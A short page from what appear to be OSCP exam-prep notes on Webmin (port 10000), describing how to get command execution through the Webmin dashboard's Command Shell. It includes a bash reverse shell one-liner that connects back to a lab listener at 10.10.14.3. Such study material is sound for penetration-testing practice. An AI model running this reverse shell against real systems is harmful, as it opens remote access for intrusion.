> For the complete documentation index, see [llms.txt](https://n000b3r.gitbook.io/oscp-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://n000b3r.gitbook.io/oscp-notes/services/10000-webmin.md).

# (10000) Webmin

<details>

<summary>Obtain RCE on Webmin</summary>

In Dashboard --> Others --> Command Shell

<figure><img src="/files/qo9I8N815G9eGR1LRF9R" alt=""><figcaption></figcaption></figure>

Put in bash reverse shell

```bash
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/4545 0>&1'
```

<figure><img src="/files/11kirCxl7kTvz1vWnveb" alt=""><figcaption></figcaption></figure>

</details>
